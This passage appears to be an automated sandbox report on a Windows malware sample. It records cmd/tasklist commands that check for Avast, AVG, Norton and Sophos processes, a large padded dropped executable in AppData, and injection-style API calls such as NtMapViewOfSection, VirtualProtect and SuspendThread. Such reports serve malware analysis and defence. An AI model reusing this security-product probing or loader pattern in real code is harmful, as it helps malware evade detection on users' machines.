                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                Start time:13:11:21
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                                                                                                                                                                                                                                Imagebase:0x7ff70f330000
                                                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                Start time:13:11:21
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:find /I "avastui.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6566e0000
                                                                                                                                                                                                                                File size:17'920 bytes
                                                                                                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                                                Start time:13:11:21
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6880f0000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                                                Start time:13:11:21
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                                                Start time:13:11:21
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                                                                                                                                                                                                                                Imagebase:0x7ff649240000
                                                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                Start time:13:11:21
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:find /I "avgui.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6566e0000
                                                                                                                                                                                                                                File size:17'920 bytes
                                                                                                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                                                Start time:13:11:21
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6880f0000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:30
                                                                                                                                                                                                                                Start time:13:11:21
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                                                Start time:13:11:21
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                                                                                                                                                                                                                                Imagebase:0x7ff649240000
                                                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:32
                                                                                                                                                                                                                                Start time:13:11:21
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:find /I "nswscsvc.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6566e0000
                                                                                                                                                                                                                                File size:17'920 bytes
                                                                                                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:33
                                                                                                                                                                                                                                Start time:13:11:22
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6880f0000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:34
                                                                                                                                                                                                                                Start time:13:11:22
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:35
                                                                                                                                                                                                                                Start time:13:11:23
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                                                                                                                                                Imagebase:0x7ff649240000
                                                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:36
                                                                                                                                                                                                                                Start time:13:11:23
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:find /I "sophoshealth.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6566e0000
                                                                                                                                                                                                                                File size:17'920 bytes
                                                                                                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:37
                                                                                                                                                                                                                                Start time:13:11:27
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:846'325'235 bytes
                                                                                                                                                                                                                                MD5 hash:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:1.2%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                  Signature Coverage:41%
                                                                                                                                                                                                                                  Total number of Nodes:117
                                                                                                                                                                                                                                  Total number of Limit Nodes:11
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 00800809
                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,00000000), ref: 008008B1
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00800C25
                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 00800CDA
                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 00800CF7
                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00800D9A
                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 00800DCD
                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00800F3E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1248616170-0
                                                                                                                                                                                                                                  • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                                                                                                  • Instruction ID: eddcc8a4f047834b66211c31902d4c3d1e7c5b2c064a268c71aa6b4bdaeac171
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F424771608311AFDBA4CF18CC44B6ABBE9FF88714F144929F989DB291D770E944CB92

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,007B0606,?,00000001,?,81EC8B55,000000FF), ref: 007B0AFE
                                                                                                                                                                                                                                  • Thread32First.KERNEL32(00000000,0000001C), ref: 007B0B2A
                                                                                                                                                                                                                                  • Wow64SuspendThread.KERNEL32(00000000), ref: 007B0B7D
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 007B0BA7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1849706056-0
                                                                                                                                                                                                                                  • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                                                                                  • Instruction ID: efbc479f83878c0f6edc737464d7e6300d66d05a97b4408a635c6061804db000
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C4100B1600108EFDB18DF98C894FEEB7B6EF88304F108169E6159B794DA74AE45CB94

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 007B0653
                                                                                                                                                                                                                                  • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 007B0947
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateProcessTerminateThread
                                                                                                                                                                                                                                  • String ID: ;18>
                                                                                                                                                                                                                                  • API String ID: 1197810419-4114189899
                                                                                                                                                                                                                                  • Opcode ID: 01db8638dc9beb1a86da21c4f28cc92fffd9a77d584b18a722812e880b597604
                                                                                                                                                                                                                                  • Instruction ID: 52b06c30d3c787e03b54ac383f886ff94489c91e7cc4a4bd6100bba1a992bbc2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01db8638dc9beb1a86da21c4f28cc92fffd9a77d584b18a722812e880b597604
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6812B0B4A00219DBDB14CF98C995BEEBBB1FF88304F2481A9D515AB385D734AA41CF94

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 007B0A3C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                                                                                  • String ID: ,
                                                                                                                                                                                                                                  • API String ID: 2422867632-3772416878
                                                                                                                                                                                                                                  • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                                                                                  • Instruction ID: 629b5df11a6da26677adfada5f175a2e754569f23085508637fcb6c3902dc2ef
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8541D274A00209EFDB04CF98C994BAEBBB1FF88314F208598D515AB391D775AE81DF94

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 290 8013ee-801401 291 801403-801406 290->291 292 801419-801423 290->292 295 801408-80140b 291->295 293 801432-80143e 292->293 294 801425-80142d 292->294 296 801441-801446 293->296 294->293 295->292 297 80140d-801417 295->297 298 801448-801453 296->298 299 801479-801480 LoadLibraryA 296->299 297->292 297->295 300 801455-80146d call 801abc 298->300 301 80146f-801473 298->301 302 801483-801487 299->302 300->301 306 801488-80148a 300->306 301->296 304 801475-801477 301->304 304->299 304->302 306->302
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00000000,?,?), ref: 00801480
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                  • String ID: .dll
                                                                                                                                                                                                                                  • API String ID: 1029625771-2738580789
                                                                                                                                                                                                                                  • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                                                                                  • Instruction ID: 4a81cfde1857396f623c2daa33664ea657cde2ff049770ced8f77e2731dfb885
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3521E4366006958FDF61CFA9DC88A6DBBA9FF01734F18416DD841CBAA1D730EC458794

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 307 800040-8000a4 call 8015e7 * 3 314 8000a6-8000a8 307->314 315 8000ce 307->315 314->315 316 8000aa-8000ac 314->316 317 8000d1-8000db 315->317 316->315 318 8000ae-8000c0 VirtualAlloc 316->318 319 8000c2-8000c9 318->319 320 8000dc-8000ff call 801a5c call 801a80 318->320 319->315 321 8000cb 319->321 326 800101-800137 call 801754 call 80162a 320->326 327 800149-800162 call 8015e7 320->327 321->315 336 800398-8003a1 326->336 337 80013d-800143 326->337 327->315 333 800168 327->333 335 80016e-800174 333->335 338 8001b0-8001b9 335->338 339 800176-80017c 335->339 342 8003a3-8003a6 336->342 343 8003a8-8003b0 336->343 337->327 337->336 340 800212-80021d 338->340 341 8001bb-8001c1 338->341 344 80017e-800181 339->344 350 800236-800239 340->350 351 80021f-800228 call 7ff334 340->351 347 8001c5-8001e0 call 8015e7 341->347 342->343 348 8003df 342->348 343->348 349 8003b2-8003dd call 801a80 343->349 345 800183-800188 344->345 346 800195-800197 344->346 345->346 354 80018a-800193 345->354 346->338 355 800199-8001a7 call 8013ee 346->355 372 8001e2-8001ea 347->372 373 8001ff-800210 347->373 352 8003e3-800403 call 801a80 VirtualFree 348->352 349->352 356 800394 350->356 357 80023f-800248 350->357 351->356 368 80022e-800234 351->368 376 800405 352->376 377 800409-80040b 352->377 354->344 354->346 369 8001ac-8001ae 355->369 356->336 363 80024a 357->363 364 80024e-800255 357->364 363->364 370 800285-800289 364->370 371 800257-800260 call 7ff1d0 364->371 368->364 369->335 374 80032b-80032e 370->374 375 80028f-8002b1 370->375 387 800262-800268 371->387 388 80026e-800277 call 7ff2cb 371->388 372->356 379 8001f0-8001f9 372->379 373->340 373->347 381 800380-800382 call 800770 374->381 382 800330-800333 374->382 375->356 392 8002b7-8002ca call 801a5c 375->392 376->377 377->317 379->356 379->373 391 800387-800388 381->391 382->381 384 800335-800338 382->384 389 800351-800362 call 7ffe31 384->389 390 80033a-80033c 384->390 387->356 387->388 388->370 404 800279-80027f 388->404 408 800373-80037e call 7ff8fd 389->408 409 800364-800370 call 800410 389->409 390->389 394 80033e-800341 390->394 395 800389-800390 391->395 406 8002cc-8002d0 392->406 407 8002ee-800327 392->407 399 800343-800346 394->399 400 800348-80034f call 800fde 394->400 395->356 401 800392 395->401 399->395 399->400 400->391 401->401 404->356 404->370 406->407 411 8002d2-8002d5 406->411 407->356 419 800329 407->419 408->391 409->408 411->374 415 8002d7-8002ec call 80185f 411->415 415->419 419->374
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008000BA
                                                                                                                                                                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 008003FE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2087232378-0
                                                                                                                                                                                                                                  • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                                                                                                                  • Instruction ID: 1647b261e3d4e7488e1a26dd8fb8b5fb1b7e9d915db6626a2517dad04040c58c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70B1F331501B06EBDBA29FA4CC84BABB7E8FF09310F110529F549D6291E731E950DFA2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: $"$"$"$"$"$"$#$#$#$#$#$#$#$$$%$%$&$'$)$+$,$,$,$,$,$,$-$-$-$-$-$-$/$0$1$1$3$4$5$6$6$7$7$7$8$8$:$:$<$=$=$>$?$?$?$@$A$B$C$C$D$D$D$D$D$E$E$F$G$G$H$I$J$K$L$M$N$O$O$P$Q$Q$R$S$T$T$U$V$W$X$X$X$Y$Z$[$\$]$^$_$`$a$b$f$f$h$l$n$t$t$t$u$v$x$x$y${${$|$}$}$~
                                                                                                                                                                                                                                  • API String ID: 0-2552012311
                                                                                                                                                                                                                                  • Opcode ID: a60d0d7c1f50fa8930e41d0816f0c6d686d7dd5bc90f90f0dee7d4406a5567cf
                                                                                                                                                                                                                                  • Instruction ID: ac3af63ef3957aa94ffb2891c93527f24145fe803c9e0f9f610b7818da6c82da
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a60d0d7c1f50fa8930e41d0816f0c6d686d7dd5bc90f90f0dee7d4406a5567cf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7613AA7010C7C18ED3359B38C4987AFBBE1AB96324F188A6DE1E987392D7798545CB13

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 879 7e426d-7e42b7 880 7e42b9-7e42bc 879->880 881 7e42be-7e4322 880->881 882 7e4324-7e4514 880->882 881->880 884 7e4516-7e4519 882->884 885 7e451f-7e45c6 884->885 886 7e45cb-7e45ff 884->886 885->884
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: $"$#$$$&$'$($*$,$.$0$2$4$6$8$8$:$<$>$?$A$B$H$J$L$M$P$P$Q$R$S$X$Z$\$^$_$`$r$w$y
                                                                                                                                                                                                                                  • API String ID: 0-810699627
                                                                                                                                                                                                                                  • Opcode ID: 0dca25496aefb40c577bd73c3ef91dbf49218b3d3d3069416841fbfb493506a1
                                                                                                                                                                                                                                  • Instruction ID: ba2c5450a4a12905d258c364152663ee51a8912ba663561f0d729d459970301c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0dca25496aefb40c577bd73c3ef91dbf49218b3d3d3069416841fbfb493506a1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CA15C2160C7D18ED336863C885939FBEC11BE7228F094A9DD5E94B2D3CAB94509C767

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 870 7e2e0d-7e2e43 871 7e2e45-7e2e48 870->871 872 7e2e4a-7e2eae 871->872 873 7e2eb0-7e30a4 871->873 872->871 875 7e30ab-7e30ae 873->875 876 7e3167-7e31af 875->876 877 7e30b4-7e3162 875->877 877->875
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
